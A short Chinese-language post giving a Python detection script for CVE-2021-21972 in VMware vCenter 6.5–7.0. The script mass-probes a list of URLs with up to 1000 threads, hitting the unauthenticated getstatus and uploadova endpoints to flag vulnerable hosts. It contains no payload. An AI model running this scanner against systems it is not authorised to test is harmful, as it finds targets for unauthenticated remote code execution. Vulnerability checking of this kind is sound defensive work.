CVE-2021-21972 vCenter 6.5-7.0 RCE 漏洞检测POC
poc如下
import requests
import threading
import warnings
warnings.filterwarnings("ignore")
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36",
}
def run(thread_function, *args):
threads = []
for par in args[0]:
thread = threading.Thread(target=thread_function, args=par)
threads.append(thread)
thread.start()
for t in threads:
t.join()
def poc(*args):
try:
url = args[0]
url1 = url + '/ui/vropspluginui/rest/services/getstatus'
url1 = url1[:7] + url1[7:].replace("//", "/")
res = requests.get(url1, headers=headers, verify=False, timeout=5)
if res.status_code == 200 and '{"States":' in res.text:
print([url, url1, "存在漏洞:Unauthorized RCE in VMware vCenter", res.text[:50]])
return True
url2 = url + '/ui/vropspluginui/rest/services/uploadova'
url2 = url2[:7] + url2[7:].replace("//", "/")
res = requests.post(url2, headers=headers, verify=False, timeout=5)
if res.status_code == 500 and '{"stackTrace":' in res.text:
print([url, url2, "存在漏洞:Unauthorized RCE in VMware vCenter", res.text[:50]])
return True
except:
pass
with open("url.txt") as f:
urllist = [(i.strip(),) for i in f.readlines()]
# print(urllist)
thread_num = 1000
for num in range(0, len(urllist), thread_num):
start = num
end = start + thread_num
run(poc, urllist[start:end])